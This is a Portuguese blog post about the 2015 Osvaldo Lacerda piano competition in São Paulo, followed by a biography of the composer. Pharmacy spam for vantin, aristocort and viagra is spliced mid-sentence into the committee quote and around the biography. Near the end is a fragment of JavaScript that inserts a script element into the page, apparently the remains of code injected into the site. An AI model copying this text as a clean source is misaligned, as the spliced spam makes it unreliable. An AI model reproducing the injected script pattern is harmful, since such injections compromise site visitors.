Concurso

Concurso Osvaldo Lacerda

Eudóxia de Barros lançou sua obra inacabada Curiosidades Musicais.

Pianistas e estudantes de piano terão oportunidade de participar, neste ano de 2015, de um dos mais importantes concursos de piano do país. O Concurso Internacional de Interpretação Pianística da Obra do Compositor Osvaldo Lacerda nasce com objetivo de homenagear e divulgar a obra do compositor paulistano. O concurso será realizado de 3 a 6 de dezembro, em São Paulo, e distribuirá um total de 60 mil reis em prêmios, além de recitais em importantes espaços culturais do país.

O Centro de Música Brasileira promove este concurso graças ao Governo do Estado de São Paulo, que, por meio da Secretaria de Estado da Cultura, na gestão do Secretário Marcelo Mattos Araújo, efetuou a compra de todo o acervo de Osvaldo Lacerda. A pianista Eudóxia de Barros, viúva do compositor e atual presidente do Centro de Música Brasileira, decidiu destinar recursos advindos de tal transação para possibilitar a premiação dos vencedores do presente concurso, num montante de 60 mil reais.

Conclusão da Comissão Avaliadora sobre o acervo: “ Order Purchase Cheap shipping vantin O acervo particular de Osvaldo Lacerda revela a importância e a dimensão intelectual de um dos compositores brasileiros mais ativos da história recente de nosso país. Nacionalista moderno e extraordinário pedagogo, construiu um acervo absolutamente coeso, rico e abrangente. É um acervo relevante e acreditamos que seja meritória sua preservação e difusão para que se criem as condições de reconhecimento do valor artístico do compositor Osvaldo Lacerda, bem como de sua parcela de contribuição para a cultura de nosso país. Todas essas publicações adquiridas pelo compositor refletem sua intelectualidade. O compositor Osvaldo Lacerda foi uma pessoa muito culta e sua relação com a literatura brasileira, principalmente com a poesia, tornou-o um dos compositores mais importantes da canção brasileira.“

 

Saiba tudo sobre o concurso: online www.concursoosvaldolacerda.com.br Cheap aristocort over the counter

 

viagra getpharma the real pharmacy Osvaldo Lacerda

Iniciou seus estudos de piano aos nove anos de idade, com Ana Veloso de Resende, aperfeiçoando-se com Maria dos Anjos Oliveira Rocha. No início, apenas sua mãe apoiava sua decisão de seguir carreira musical. Seu pai preferia fazer dele um advogado. Em 1947, Osvaldo Lacerda passa a ter aulas de piano com José Kliass e, três anos depois, com Camargo Guarnieri, que o desaconselha a tentar ser pianista para se dedicar à composição.

Em 1963, graças aos incentivos de Camargo Guarnieri, Osvaldo Lacerda passa a ter aulas com outros compositores. Recebe, então, uma bolsa da Fundação Guggenheim para ter aulas com Aaron Copland e Vittorio Giannini, nos Estados Unidos. Pouco antes, contudo, Osvaldo Lacerda formou-se em Direito para satisfazer seu pai. Nesta época também criou a Sociedade Pró-Música Brasileira.

Em maio de 1965, foi um dos compositores que o Ministério das Relações Exteriores enviou aos Estados Unidos, para representar o Brasil no Seminário Interamericano de Compositores, na Universidade de Indiana, e no IIIº Festival Interamericano de Música, em Washington. Em abril de 1996, foi um dos compositores brasileiros que a American Composers Orchestra convidou para participar, em Nova York, do Festival “Sonido de las Américas: Brazil”.

Entre 1966 e 1970, Osvaldo Lacerda atuou como consultor na Comissão Nacional de Música Sacra e uma de suas atividades foi a proposição do uso da música sacra brasileira na liturgia da Igreja Católica.

Em 1982 ele se casou com sua antiga aluna, a pianista Eudóxia de Barros.

Osvaldo Lacerda tornou-se também professor da Escola Municipal de Música de São Paulo, cargo do qual se aposentou em 1992. Lacerda ocupava a cadeira de número 9 da Academia Brasileira de Música, que já foi de Brasílio Itiberê da Cunha.

Morreu em 18 de julho de 2011, por falência múltipla dos órgãos, em São Paulo (SP), aos 84 anos de idade.

Eudóxia de Barros lançou sua obra inacabada Curiosidades Musicais.} else {document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.